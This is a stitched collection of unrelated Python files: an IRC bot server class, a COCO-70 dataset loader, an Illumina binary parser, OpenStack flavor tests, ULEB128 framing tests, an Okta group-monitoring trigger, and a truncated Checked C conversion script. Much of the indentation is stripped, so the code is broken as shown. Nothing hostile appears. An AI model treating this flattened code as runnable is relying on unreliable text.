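def enhance_block(rule_index, block):
    """Look up the replacement for one side-by-side block sliced from the board."""
    return rule_index[(len(block), block.astype(np.uint8).tobytes())]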
import asyncio
from asyncio import Future, PriorityQueue
from typing import (AsyncIterable, Awaitable, Deque, Dict, Iterable, List,
Optional, Set, Tuple, Union)
from collections import deque
from time import monotonic
import anyio
from asyncio_rlock import RLock
from asyncio_throttle import Throttler
from async_timeout import timeout as timeout_
from ircstates import Emit, Channel, ChannelUser
from ircstates.numerics import *
from ircstates.server import ServerDisconnectedException
from ircstates.names import Name
from irctokens import build, Line, tokenise
from .ircv3 import (CAPContext, sts_transmute, CAP_ECHO, CAP_SASL,
CAP_LABEL, LABEL_TAG_MAP, resume_transmute)
from .sasl import SASLContext, SASLResult
from .matching import (ResponseOr, Responses, Response, ANY, SELF, MASK_SELF,
Folded)
from .asyncs import MaybeAwait, WaitFor
from .struct import Whois
from .params import ConnectionParams, SASLParams, STSPolicy, ResumePolicy
from .interface import (IBot, ICapability, IServer, SentLine, SendPriority,
IMatchResponse)
from .interface import ITCPTransport, ITCPReader, ITCPWriter
THROTTLE_RATE = 4 # lines
THROTTLE_TIME = 2 # seconds
PING_TIMEOUT = 60 # seconds
WAIT_TIMEOUT = 20 # seconds
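# Numerics that report a failed JOIN and carry the target channel as their first
# non-client parameter; send_joins() below matches on these to resolve each attempt.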
JOIN_ERR_FIRST = [
ERR_NOSUCHCHANNEL,
ERR_BADCHANNAME,
ERR_UNAVAILRESOURCE,
ERR_TOOMANYCHANNELS,
ERR_BANNEDFROMCHAN,
ERR_INVITEONLYCHAN,
ERR_BADCHANNELKEY,
ERR_NEEDREGGEDNICK,
ERR_THROTTLE
]
class Server(IServer):
_reader: ITCPReader
_writer: ITCPWriter
params: ConnectionParams
def __init__(self, bot: IBot, name: str):
super().__init__(name)
self.bot = bot
self.disconnected = False
self.throttle = Throttler(rate_limit=100, period=1)
self.sasl_state = SASLResult.NONE
self.last_read = monotonic()
self._sent_count: int = 0
self._send_queue: PriorityQueue[SentLine] = PriorityQueue()
self.desired_caps: Set[ICapability] = set([])
self._read_queue: Deque[Line] = deque()
self._process_queue: Deque[Tuple[Line, Optional[Emit]]] = deque()
self._ping_sent = False
self._read_lguard = RLock()
self.read_lock = self._read_lguard
self._read_lwork = asyncio.Lock()
self._wait_for = asyncio.Event()
self._pending_who: Deque[str] = deque()
self._alt_nicks: List[str] = []
def hostmask(self) -> str:
hostmask = self.nickname
if not self.username is None:
hostmask += f"!{self.username}"
if not self.hostname is None:
hostmask += f"@{self.hostname}"
return hostmask
def send_raw(self, line: str, priority=SendPriority.DEFAULT
) -> Awaitable[SentLine]:
return self.send(tokenise(line), priority)
def send(self,
line: Line,
priority=SendPriority.DEFAULT
) -> Awaitable[SentLine]:
self.line_presend(line)
sent_line = SentLine(self._sent_count, priority, line)
self._sent_count += 1
label = self.cap_available(CAP_LABEL)
if not label is None:
tag = LABEL_TAG_MAP[label]
if line.tags is None or not tag in line.tags:
if line.tags is None:
line.tags = {}
line.tags[tag] = str(sent_line.id)
self._send_queue.put_nowait(sent_line)
return sent_line.future
def set_throttle(self, rate: int, time: float):
self.throttle.rate_limit = rate
self.throttle.period = time
def server_address(self) -> Tuple[str, int]:
return self._writer.get_peer()
async def connect(self,
transport: ITCPTransport,
params: ConnectionParams):
await sts_transmute(params)
await resume_transmute(params)
reader, writer = await transport.connect(
params.host,
params.port,
tls =params.tls,
bindhost =params.bindhost)
self._reader = reader
self._writer = writer
self.params = params
await self.handshake()
async def disconnect(self):
if not self._writer is None:
await self._writer.close()
self._writer = None
self._read_queue.clear()
async def handshake(self):
nickname = self.params.nickname
username = self.params.username or nickname
realname = self.params.realname or nickname
alt_nicks = self.params.alt_nicknames
if not alt_nicks:
alt_nicks = [nickname+"_"*i for i in range(1, 4)]
self._alt_nicks = alt_nicks
# these must remain non-awaited; reading hasn't started yet
if not self.params.password is None:
self.send(build("PASS", [self.params.password]))
self.send(build("CAP", ["LS", "302"]))
self.send(build("NICK", [nickname]))
self.send(build("USER", [username, "0", "*", realname]))
# to be overridden
def line_preread(self, line: Line):
pass
def line_presend(self, line: Line):
pass
async def line_read(self, line: Line):
pass
async def line_send(self, line: Line):
pass
async def sts_policy(self, sts: STSPolicy):
pass
async def resume_policy(self, resume: ResumePolicy):
pass
    # /to be overridden
async def _on_read(self, line: Line, emit: Optional[Emit]):
if line.command == "PING":
await self.send(build("PONG", line.params))
elif line.command == RPL_ENDOFWHO:
chan = self.casefold(line.params[1])
if (self._pending_who and
self._pending_who[0] == chan):
self._pending_who.popleft()
await self._next_who()
elif (line.command in {
ERR_NICKNAMEINUSE, ERR_ERRONEUSNICKNAME, ERR_UNAVAILRESOURCE
} and not self.registered):
if self._alt_nicks:
nick = self._alt_nicks.pop(0)
await self.send(build("NICK", [nick]))
else:
await self.send(build("QUIT"))
elif line.command in [RPL_ENDOFMOTD, ERR_NOMOTD]:
# we didn't get the nickname we wanted. watch for it if we can
if not self.nickname == self.params.nickname:
target = self.params.nickname
if self.isupport.monitor is not None:
await self.send(build("MONITOR", ["+", target]))
elif self.isupport.watch is not None:
await self.send(build("WATCH", [f"+{target}"]))
# has someone just stopped using the nickname we want?
elif line.command == RPL_LOGOFF:
await self._check_regain([line.params[1]])
elif line.command == RPL_MONOFFLINE:
await self._check_regain(line.params[1].split(","))
elif (line.command in ["NICK", "QUIT"] and
line.source is not None):
await self._check_regain([line.hostmask.nickname])
elif emit is not None:
if emit.command == RPL_WELCOME:
await self.send(build("WHO", [self.nickname]))
self.set_throttle(THROTTLE_RATE, THROTTLE_TIME)
if self.params.autojoin:
await self._batch_joins(self.params.autojoin)
elif emit.command == "CAP":
if emit.subcommand == "NEW":
await self._cap_ls(emit)
elif (emit.subcommand == "LS" and
emit.finished):
if not self.registered:
await CAPContext(self).handshake()
else:
await self._cap_ls(emit)
elif emit.command == "JOIN":
if emit.self and not emit.channel is None:
chan = emit.channel.name_lower
await self.send(build("MODE", [chan]))
modes = "".join(self.isupport.chanmodes.a_modes)
await self.send(build("MODE", [chan, f"+{modes}"]))
self._pending_who.append(chan)
if len(self._pending_who) == 1:
await self._next_who()
await self.line_read(line)
async def _check_regain(self, nicks: List[str]):
for nick in nicks:
if (self.casefold_equals(nick, self.params.nickname) and
not self.nickname == self.params.nickname):
await self.send(build("NICK", [self.params.nickname]))
async def _batch_joins(self,
channels: List[str],
batch_n: int=10):
#TODO: do as many JOINs in one line as we can fit
#TODO: channel keys
for i in range(0, len(channels), batch_n):
batch = channels[i:i+batch_n]
await self.send(build("JOIN", [",".join(batch)]))
async def _next_who(self):
if self._pending_who:
chan = self._pending_who[0]
if self.isupport.whox:
await self.send(self.prepare_whox(chan))
else:
await self.send(build("WHO", [chan]))
async def _read_line(self, timeout: float) -> Optional[Line]:
while True:
if self._read_queue:
return self._read_queue.popleft()
try:
async with timeout_(timeout):
data = await self._reader.read(1024)
except asyncio.TimeoutError:
return None
self.last_read = monotonic()
lines = self.recv(data)
for line in lines:
self.line_preread(line)
self._read_queue.append(line)
async def _read_lines(self):
while True:
async with self._read_lguard:
pass
if not self._process_queue:
async with self._read_lwork:
read_aw = self._read_line(PING_TIMEOUT)
dones, notdones = await asyncio.wait(
[read_aw, self._wait_for.wait()],
return_when=asyncio.FIRST_COMPLETED
)
self._wait_for.clear()
for done in dones:
if isinstance(done.result(), Line):
self._ping_sent = False
line = done.result()
emit = self.parse_tokens(line)
self._process_queue.append((line, emit))
elif done.result() is None:
if not self._ping_sent:
await self.send(build("PING", ["hello"]))
self._ping_sent = True
else:
await self.disconnect()
raise ServerDisconnectedException()
for notdone in notdones:
notdone.cancel()
else:
line, emit = self._process_queue.popleft()
await self._on_read(line, emit)
async def wait_for(self,
response: Union[IMatchResponse, Set[IMatchResponse]],
sent_aw: Optional[Awaitable[SentLine]]=None,
timeout: float=WAIT_TIMEOUT
) -> Line:
response_obj: IMatchResponse
if isinstance(response, set):
response_obj = ResponseOr(*response)
else:
response_obj = response
async with self._read_lguard:
self._wait_for.set()
async with self._read_lwork:
async with timeout_(timeout):
while True:
line = await self._read_line(timeout)
if line:
self._ping_sent = False
emit = self.parse_tokens(line)
self._process_queue.append((line, emit))
if response_obj.match(self, line):
return line
async def _on_send_line(self, line: Line):
if (line.command in ["PRIVMSG", "NOTICE", "TAGMSG"] and
not self.cap_agreed(CAP_ECHO)):
new_line = line.with_source(self.hostmask())
self._read_queue.append(new_line)
async def _send_lines(self):
while True:
lines: List[SentLine] = []
while (not lines or
(len(lines) < 5 and self._send_queue.qsize() > 0)):
prio_line = await self._send_queue.get()
lines.append(prio_line)
for line in lines:
async with self.throttle:
self._writer.write(
f"{line.line.format()}\r\n".encode("utf8"))
await self._writer.drain()
for line in lines:
await self._on_send_line(line.line)
await self.line_send(line.line)
line.future.set_result(line)
# CAP-related
def cap_agreed(self, capability: ICapability) -> bool:
return bool(self.cap_available(capability))
def cap_available(self, capability: ICapability) -> Optional[str]:
return capability.available(self.agreed_caps)
async def _cap_ls(self, emit: Emit):
if not emit.tokens is None:
tokens: Dict[str, str] = {}
for token in emit.tokens:
key, _, value = token.partition("=")
tokens[key] = value
await CAPContext(self).on_ls(tokens)
async def sasl_auth(self, params: SASLParams) -> bool:
if (self.sasl_state == SASLResult.NONE and
self.cap_agreed(CAP_SASL)):
res = await SASLContext(self).from_params(params)
self.sasl_state = res
return True
else:
return False
# /CAP-related
def send_nick(self, new_nick: str) -> Awaitable[bool]:
fut = self.send(build("NICK", [new_nick]))
async def _assure() -> bool:
line = await self.wait_for({
Response("NICK", [Folded(new_nick)], source=MASK_SELF),
Responses([
ERR_BANNICKCHANGE,
ERR_NICKTOOFAST,
ERR_CANTCHANGENICK
], [ANY]),
Responses([
ERR_NICKNAMEINUSE,
ERR_ERRONEUSNICKNAME,
ERR_UNAVAILRESOURCE
], [ANY, Folded(new_nick)])
}, fut)
return line.command == "NICK"
return MaybeAwait(_assure)
def send_join(self,
name: str,
key: Optional[str]=None
) -> Awaitable[Channel]:
fut = self.send_joins([name], [] if key is None else [key])
async def _assure():
channels = await fut
return channels[0]
return MaybeAwait(_assure)
def send_part(self, name: str):
fut = self.send(build("PART", [name]))
async def _assure():
line = await self.wait_for(
Response("PART", [Folded(name)], source=MASK_SELF),
fut
)
return
return MaybeAwait(_assure)
def send_joins(self,
names: List[str],
keys: List[str]=[]
) -> Awaitable[List[Channel]]:
folded_names = [self.casefold(name) for name in names]
if not keys:
fut = self.send(build("JOIN", [",".join(names)]))
else:
fut = self.send(build("JOIN", [",".join(names)]+keys))
async def _assure():
channels: List[Channel] = []
while folded_names:
line = await self.wait_for({
Response(RPL_CHANNELMODEIS, [ANY, ANY]),
Responses(JOIN_ERR_FIRST, [ANY, ANY]),
Response(ERR_USERONCHANNEL, [ANY, SELF, ANY]),
Response(ERR_LINKCHANNEL, [ANY, ANY, ANY])
}, fut)
chan: Optional[str] = None
if line.command == RPL_CHANNELMODEIS:
chan = line.params[1]
elif line.command in JOIN_ERR_FIRST:
chan = line.params[1]
elif line.command == ERR_USERONCHANNEL:
chan = line.params[2]
elif line.command == ERR_LINKCHANNEL:
#XXX i dont like this
chan = line.params[2]
await self.wait_for(
Response(RPL_CHANNELMODEIS, [ANY, Folded(chan)])
)
channels.append(self.channels[self.casefold(chan)])
continue
if chan is not None:
folded = self.casefold(chan)
if folded in folded_names:
folded_names.remove(folded)
channels.append(self.channels[folded])
return channels
return MaybeAwait(_assure)
def send_message(self, target: str, message: str
) -> Awaitable[Optional[str]]:
fut = self.send(build("PRIVMSG", [target, message]))
async def _assure():
line = await self.wait_for(
Response("PRIVMSG", [Folded(target), ANY], source=MASK_SELF),
fut
)
if line.command == "PRIVMSG":
return line.params[1]
else:
return None
return MaybeAwait(_assure)
def send_whois(self,
target: str,
remote: bool=False
) -> Awaitable[Optional[Whois]]:
args = [target]
if remote:
args.append(target)
fut = self.send(build("WHOIS", args))
async def _assure() -> Optional[Whois]:
folded = self.casefold(target)
params = [ANY, Folded(folded)]
obj = Whois()
while True:
line = await self.wait_for(Responses([
ERR_NOSUCHNICK,
ERR_NOSUCHSERVER,
RPL_WHOISUSER,
RPL_WHOISSERVER,
RPL_WHOISOPERATOR,
RPL_WHOISIDLE,
RPL_WHOISCHANNELS,
RPL_WHOISHOST,
RPL_WHOISACCOUNT,
RPL_WHOISSECURE,
RPL_ENDOFWHOIS
], params), fut)
if line.command in [ERR_NOSUCHNICK, ERR_NOSUCHSERVER]:
return None
elif line.command == RPL_WHOISUSER:
nick, user, host, _, real = line.params[1:]
obj.nickname = nick
obj.username = user
obj.hostname = host
obj.realname = real
elif line.command == RPL_WHOISIDLE:
idle, signon, _ = line.params[2:]
obj.idle = int(idle)
obj.signon = int(signon)
elif line.command == RPL_WHOISACCOUNT:
obj.account = line.params[2]
elif line.command == RPL_WHOISCHANNELS:
channels = list(filter(bool, line.params[2].split(" ")))
if obj.channels is None:
obj.channels = []
for i, channel in enumerate(channels):
symbols = ""
while channel[0] in self.isupport.prefix.prefixes:
symbols += channel[0]
channel = channel[1:]
channel_user = ChannelUser(
Name(obj.nickname, folded),
Name(channel, self.casefold(channel))
)
for symbol in symbols:
mode = self.isupport.prefix.from_prefix(symbol)
if mode is not None:
channel_user.modes.add(mode)
obj.channels.append(channel_user)
elif line.command == RPL_ENDOFWHOIS:
return obj
        return MaybeAwait(_assure) | ircrobots/server.py | 0.550728 | 0.075687
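# A self-contained sketch of the "send now, await the confirmation only if you care"
# pattern that the send_* helpers above expose through MaybeAwait. The MiniMaybeAwait
# class and the send_ping() example are illustrative assumptions, not ircrobots APIs.
import asyncio

class MiniMaybeAwait:
    """Wrap a coroutine factory; the coroutine is created and run only if awaited."""
    def __init__(self, coro_factory):
        self._coro_factory = coro_factory
    def __await__(self):
        return self._coro_factory().__await__()

def send_ping(delay=0.01):
    async def _confirm():
        await asyncio.sleep(delay)  # stand-in for waiting on the matching reply line
        return "PONG"
    return MiniMaybeAwait(_confirm)

async def _demo():
    send_ping()                         # fire-and-forget: confirmation never requested
    assert await send_ping() == "PONG"  # awaiting runs the confirmation coroutine

asyncio.run(_demo())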
import os
from typing import Optional
from .imagelist import ImageList
from ._util import download as download_data, check_exits
class COCO70(ImageList):
"""COCO-70 dataset is a large-scale classification dataset (1000 images per class) created from
`COCO <https://cocodataset.org/>`_ Dataset.
It is used to explore the effect of fine-tuning with a large amount of data.
Args:
root (str): Root directory of dataset
split (str, optional): The dataset split, supports ``train``, or ``test``.
sample_rate (int): The sampling rates to sample random ``training`` images for each category.
Choices include 100, 50, 30, 15. Default: 100.
download (bool, optional): If true, downloads the dataset from the internet and puts it \
in root directory. If dataset is already downloaded, it is not downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image and returns a \
transformed version. E.g, :class:`torchvision.transforms.RandomCrop`.
target_transform (callable, optional): A function/transform that takes in the target and transforms it.
.. note:: In `root`, there will exist following files after downloading.
::
train/
test/
image_list/
train_100.txt
train_50.txt
train_30.txt
train_15.txt
test.txt
"""
download_list = [
("image_list", "image_list.zip", "https://cloud.tsinghua.edu.cn/f/d2ffb62fe3d140f1a73c/?dl=1"),
("train", "train.tgz", "https://cloud.tsinghua.edu.cn/f/e0dc4368342948c5bb2a/?dl=1"),
("test", "test.tgz", "https://cloud.tsinghua.edu.cn/f/59393a55c818429fb8d1/?dl=1"),
]
image_list = {
"train": "image_list/train_100.txt",
"train100": "image_list/train_100.txt",
"train50": "image_list/train_50.txt",
"train30": "image_list/train_30.txt",
"train15": "image_list/train_15.txt",
"test": "image_list/test.txt",
"test100": "image_list/test.txt",
}
CLASSES =['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck',
'boat', 'traffic_light', 'fire_hydrant', 'stop_sign', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella',
'handbag', 'tie', 'suitcase', 'skis', 'kite', 'baseball_bat', 'skateboard', 'surfboard',
'tennis_racket', 'bottle', 'wine_glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana',
'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot_dog', 'pizza', 'donut', 'cake',
'chair', 'couch', 'potted_plant', 'bed', 'dining_table', 'toilet', 'tv', 'laptop',
'remote', 'keyboard', 'cell_phone', 'microwave', 'oven', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'teddy_bear']
def __init__(self, root: str, split: str, sample_rate: Optional[int] =100, download: Optional[bool] = False, **kwargs):
if split == 'train':
list_name = 'train' + str(sample_rate)
assert list_name in self.image_list
data_list_file = os.path.join(root, self.image_list[list_name])
else:
data_list_file = os.path.join(root, self.image_list['test'])
if download:
list(map(lambda args: download_data(root, *args), self.download_list))
else:
            list(map(lambda args: check_exits(root, args[0]), self.download_list))
        super(COCO70, self).__init__(root, COCO70.CLASSES, data_list_file=data_list_file, **kwargs) | common/vision/datasets/coco70.py | 0.822653 | 0.459986
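# A hedged usage sketch for the COCO70 class above, not part of the original module.
# The root path is an assumption, and running it needs torchvision installed plus
# network access to the download URLs listed in download_list.
if __name__ == '__main__':
    from torchvision import transforms

    train_set = COCO70(root='data/coco70', split='train', sample_rate=30,
                       download=True, transform=transforms.ToTensor())
    image, label = train_set[0]
    print(len(train_set), image.shape, label)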
import pandas
from bitstring import ReadError
from .base_parser_class import InteropBinParser
class InteropControlMetrics(InteropBinParser):
__version = 0.1
supported_versions = [1]
codename = 'control'
def _init_variables(self):
self.data = { 'lane': [],
'tile': [],
'read': [],
'control_str': [],
'index_str': [],
'clusters': []
}
def parse_binary(self):
bs = self.bs
# Control Metrics (ControlMetricsOut.bin)
# Contains pull out information for Illumina in-line sample controls
# Format:
# byte 0: file version number (1) bytes (variable length): record:
# 2 bytes: lane number (uint16)
# 2 bytes: tile number (uint16)
# 2 bytes: read number (uint16)
# 2 bytes: number bytes X for control name(uint16)
# X bytes: control name string (string in UTF8Encoding)
# 2 bytes: number bytes Y for index name(uint16)
# Y bytes: index name string (string in UTF8Encoding)
# 4 bytes: num of clusters identified as control (uint32)
self.apparent_file_version = bs.read('uintle:8') # version number of binary
self.check_version(self.apparent_file_version)
try:
while True:
self.data['lane'].append(bs.read('uintle:16'))
self.data['tile'].append(bs.read('uintle:16'))
self.data['read'].append(bs.read('uintle:16'))
# next 2 bytes: expected control name length in bytes.
nextbytes = bs.read('uintle:16')
self.data['control_str'].append(bs.read('bytes:%i' % (nextbytes)))
# next 2 bytes: expected index name length in bytes.
nextbytes = bs.read('uintle:16')
self.data['index_str'].append(bs.read('bytes:%i' % (nextbytes)))
self.data['clusters'].append(bs.read('uintle:32'))
except ReadError:
pass
self.df = pandas.DataFrame(self.data)
def __str__(self):
#TODO: to_str (improve output)
out = "%s\n" % self.df.head()
return out
if __name__=='__main__':
import sys
    try:
        filename = sys.argv[1]
    except IndexError:
        print( "supply path to ControlMetricsOut.bin" )
        sys.exit()
CM = InteropControlMetrics(filename)
    print(CM) | illuminate/control_metrics.py | 0.390011 | 0.22448
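# A small standalone sketch (not part of illuminate) that packs one synthetic record in
# the ControlMetricsOut.bin layout documented in parse_binary above: little-endian
# uint16 lane/tile/read, two length-prefixed UTF-8 names, and a uint32 cluster count.
# The field values below are made up; only the standard-library struct module is used.
import struct

def pack_control_record(lane, tile, read, control_name, index_name, clusters):
    control_bytes = control_name.encode('utf8')
    index_bytes = index_name.encode('utf8')
    return (struct.pack('<HHH', lane, tile, read)
            + struct.pack('<H', len(control_bytes)) + control_bytes
            + struct.pack('<H', len(index_bytes)) + index_bytes
            + struct.pack('<I', clusters))

_record = pack_control_record(1, 1101, 1, 'CTE1-244', 'ATCACGAC', 42)
assert len(_record) == 6 + 2 + len('CTE1-244') + 2 + len('ATCACGAC') + 4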
from cafe.drivers.unittest.decorators import tags
from cloudcafe.common.tools.datagen import rand_name
from cloudcafe.compute.common.exceptions import BadRequest, ItemNotFound
from cloudroast.compute.fixtures import ComputeAdminFixture
class DeleteFlavorTest(ComputeAdminFixture):
@classmethod
def setUpClass(cls):
"""
        Perform actions that set up the necessary resources for testing
The following resources are created during this setup:
- A public flavor with a name starting with 'flavor', 64MB of RAM,
1 vcpu, 10GB disk space
The created flavor is then deleted.
"""
super(DeleteFlavorTest, cls).setUpClass()
cls.flavor_name = rand_name('flavor')
cls.flavor = cls.admin_flavors_client.create_flavor(
name=cls.flavor_name, ram='64', vcpus='1', disk='10',
is_public=True).entity
cls.admin_flavors_client.delete_flavor(cls.flavor.id)
@tags(type='positive', net='no')
def test_get_deleted_flavor(self):
"""
        Test that a flavor deleted during setup can still be retrieved
Validate that the detailed information of the flavor created and
deleted during setup can be accessed.
"""
self.admin_flavors_client.get_flavor_details(self.flavor.id)
@tags(type='negative', net='no')
def test_create_server_from_deleted_flavor(self):
"""
Test that a deleted flavor cannot be used to create an instance
        Validate that you receive a 'Bad Request' error when a user attempts
to create an instance with a flavor created and deleted during setup.
The following assertions occur:
            - The create instance request raises a 'Bad Request' error
"""
with self.assertRaises(BadRequest):
self.server_behaviors.create_active_server(
flavor_ref=self.flavor.id)
@tags(type='negative', net='no')
def test_delete_deleted_flavor_fails(self):
"""
Test that a previously deleted flavor cannot be deleted
Validate that you receive an 'Item Not Found' error when a user
attempts to delete the flavor that was created and deleted during
setup.
The following assertions occur:
            - The delete flavor request raises an 'Item Not Found' error
"""
with self.assertRaises(ItemNotFound):
            self.admin_flavors_client.delete_flavor(self.flavor.id) | cloudroast/compute/admin_api/flavors/test_delete_flavor.py | 0.741206 | 0.308229
from __future__ import absolute_import, division, print_function, unicode_literals
from itertools import chain
from nose.tools import eq_, raises
from six.moves import xrange
from smarkets.streaming_api.framing import (
frame_decode_all, frame_encode, IncompleteULEB128, uleb128_decode, uleb128_encode,
)
test_data = (
(0x00000000, b'\x00'),
(0x0000007F, b'\x7F'),
(0x00000080, b'\x80\x01'),
(624485, b'\xE5\x8E\x26'),
(268435202, b'\x82\xFE\xFF\x7F'),
)
def test_dumps():
for value, string in test_data:
yield check_dumps, value, string
def check_dumps(value, string):
eq_(uleb128_encode(value), string)
def test_loads():
for value, string in test_data:
yield check_loads, bytearray(string), value
def check_loads(byte_array, value):
eq_(uleb128_decode(byte_array), (value, len(byte_array)))
def test_loads_and_dumps_are_consistent():
for i in chain(
xrange(2 ** 18),
xrange(2 ** 20, 2 ** 26, 33333),
xrange(2 ** 26, 2 ** 32, 777777),
):
byte_dump = uleb128_encode(i)
eq_(uleb128_decode(byte_dump), (i, len(byte_dump)))
@raises(ValueError)
def test_uleb128_encode_fails_on_negative_number():
uleb128_encode(-1)
def test_uleb128_decode_fails_on_invalid_input():
byte_array = uleb128_encode(12345678)
for i in xrange(len(byte_array)):
yield check_uleb128_decode_fails_on_invalid_input, byte_array[:i]
@raises(IncompleteULEB128)
def check_uleb128_decode_fails_on_invalid_input(input_):
uleb128_decode(input_)
def test_frame_encode():
for input_, output in (
(b'', b'\x00\x00\x00\x00'),
(b'a', b'\x01a\x00\x00'),
(b'ab', b'\x02ab\x00'),
(b'abc', b'\x03abc'),
(b'abcd', b'\x04abcd'),
):
yield check_frame_encode, bytearray(input_), output
def check_frame_encode(byte_array, output):
frame = bytearray()
frame_encode(frame, byte_array)
eq_(frame, output)
def test_frame_decode_all():
for input_, output in (
# frame matches the boundary
(b'', ([], b'')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd', ([b'a', b'ab', b'abc', b'abcd'], b'')),
# ends with complete header but only part of a message
(b'\x03ab', ([], b'\x03ab')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd\x03ab', ([b'a', b'ab', b'abc', b'abcd'], b'\x03ab')),
(b'\x05abcd', ([], b'\x05abcd')),
# ends with incomplete header
(b'\x80', ([], b'\x80')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd\x03ab', ([b'a', b'ab', b'abc', b'abcd'], b'\x03ab')),
# 4(or more)-byte incomplete header is a special case because it reaches the minimum frame size
# so let's make sure decoding doesn't fail at header decoding stage
(b'\x80\x80\x80\x80', ([], b'\x80\x80\x80\x80')),
(b'\x80\x80\x80\x80\x80', ([], b'\x80\x80\x80\x80\x80')),
# regression: if the second frame is shorter, we still want to decode both...
(b'\x05abcde\x03abc', ([b'abcde', b'abc'], b'')),
):
yield check_frame_decode_all, bytearray(input_), output
def check_frame_decode_all(byte_array, output):
    eq_(frame_decode_all(byte_array), output) | smarkets/tests/streaming_api/framing.py | 0.736685 | 0.30641
import komand
import time
from .schema import UsersAddedRemovedFromGroupInput, UsersAddedRemovedFromGroupOutput, Input, Output, Component
# Custom imports below
from komand.exceptions import PluginException
from komand_okta.util import helpers
class UsersAddedRemovedFromGroup(komand.Trigger):
def __init__(self):
super(self.__class__, self).__init__(
name='users_added_removed_from_group',
description=Component.DESCRIPTION,
input=UsersAddedRemovedFromGroupInput(),
output=UsersAddedRemovedFromGroupOutput())
def run(self, params={}):
"""Run the trigger"""
group_list = params.get(Input.GROUP_IDS)
okta_url = self.connection.okta_url
current_list = list()
group_names = list()
for group in group_list:
api = f"{okta_url}/api/v1/groups/{group}/users"
# Build a reference list to check for updates against
response = self.connection.session.get(api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double-check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
data = komand.helper.clean(data)
current_list.append({group: data})
# Get group names
group_name_api = f"{okta_url}/api/v1/groups/{group}"
response = self.connection.session.get(group_name_api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
group_names.append(data["profile"]["name"])
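# Poll forever: re-fetch each group's membership, diff it against the reference list built above,
# send any additions/removals to the orchestrator, then sleep for the configured interval.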
while True:
new_list = list()
for group in group_list:
api = f"{okta_url}/api/v1/groups/{group}/users"
response = self.connection.session.get(api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
data = komand.helper.clean(data)
new_list.append({group: data})
added = list()
removed = list()
for index, value in enumerate(group_list):
# Find added group members
added_users = []
for new_user in new_list[index][value]:
found = False
for old_user in current_list[index][value]:
if new_user["id"] == old_user["id"]:
found = True
if not found:
added_users.append(new_user)
# Find removed group members
removed_users = []
for old_user in current_list[index][value]:
found = False
for new_user in new_list[index][value]:
if old_user["id"] == new_user["id"]:
found = True
if not found:
removed_users.append(old_user)
if added_users:
added.append({"group_name": group_names[index], "group_id": value, "users": added_users})
if removed_users:
removed.append({"group_name": group_names[index], "group_id": value, "users": removed_users})
if added and removed:
self.logger.info("Users added and removed, sending to orchestrator.")
self.send({Output.USERS_ADDED_FROM_GROUPS: added, Output.USERS_REMOVED_FROM_GROUPS: removed})
elif added and not removed:
self.logger.info("Users added, sending to orchestrator.")
self.send({Output.USERS_ADDED_FROM_GROUPS: added, Output.USERS_REMOVED_FROM_GROUPS: []})
elif removed and not added:
self.logger.info("Users removed, sending to orchestrator.")
self.send({Output.USERS_REMOVED_FROM_GROUPS: removed, Output.USERS_ADDED_FROM_GROUPS: []})
current_list = new_list
sleep_time = params.get(Input.INTERVAL, 300)
self.logger.info(f"Loop complete, sleeping for {sleep_time}...")
time.sleep(sleep_time) | okta/komand_okta/triggers/users_added_removed_from_group/trigger.py | 0.389663 | 0.113826 |
import re
import os
import json
import argparse
import traceback
import subprocess
"""
This tool will invoke checked-c-convert on a compile_commands.json database.
It contains some work-arounds for cmake+nmake generated compile_commands.json
files, where the files are malformed.
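Example invocation (the paths and converter name are illustrative):
python convert-commands.py build/compile_commands.json checked-c-convert
Besides running the converter on each translation unit, the visited commands are also
written to convert.sh.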
"""
SLASH = os.sep
# to separate multiple commands in a line
CMD_SEP = " ;"
DEFAULT_ARGS = ["-dump-stats", "-output-postfix=checked"]
if os.name == "nt":
DEFAULT_ARGS.append("-extra-arg-before=--driver-mode=cl")
CMD_SEP = " &"
def getCheckedCArgs(argument_list):
"""
Convert the compilation arguments (include folder and #defines)
to checked C format.
:param argument_list: list of compiler arguments.
:return: argument string
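Example (illustrative):
>>> getCheckedCArgs(['-DDEBUG', '-I/usr/include', '-O2'])
['-extra-arg=-DDEBUG', '-extra-arg=-I/usr/include']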
"""
clang_x_args = []
for curr_arg in argument_list:
if curr_arg.startswith("-D") or curr_arg.startswith("-I"):
clang_x_args.append('-extra-arg=' + curr_arg)
return clang_x_args
def tryFixUp(s):
"""
Fix-up for a failure between cmake and nmake.
"""
b = open(s, 'r').read()
b = re.sub(r'@<<\n', "", b)
b = re.sub(r'\n<<', "", b)
f = open(s, 'w')
f.write(b)
f.close()
return
def runMain(args):
runs = 0
cmds = None
while runs < 2:
runs = runs + 1
try:
cmds = json.load(open(args.compile_commands, 'r'))
except Exception:
traceback.print_exc()
tryFixUp(args.compile_commands)
if cmds is None:
print("failed")
return
s = set()
for i in cmds:
file_to_add = i['file']
compiler_args = ""
target_directory = ""
if file_to_add.endswith(".cpp"):
continue # Checked C extension doesn't support cpp files yet
# BEAR uses relative paths for 'file' rather than absolute paths. It also
# has a field called 'arguments' instead of 'command' in the cmake style.
# Use that to detect BEAR and add the directory.
if 'arguments' in i and not 'command' in i:
# BEAR. Need to add directory.
file_to_add = i['directory'] + SLASH + file_to_add
# get the compiler arguments
compiler_args = getCheckedCArgs(i["arguments"])
# get the directory used during compilation.
target_directory = i['directory']
file_to_add = os.path.realpath(file_to_add)
s.add((frozenset(compiler_args), target_directory, file_to_add))
prog_name = args.prog_name
f = open('convert.sh', 'w')
for compiler_args, target_directory, src_file in s:
args = []
# get the command to change the working directory
change_dir_cmd = ""
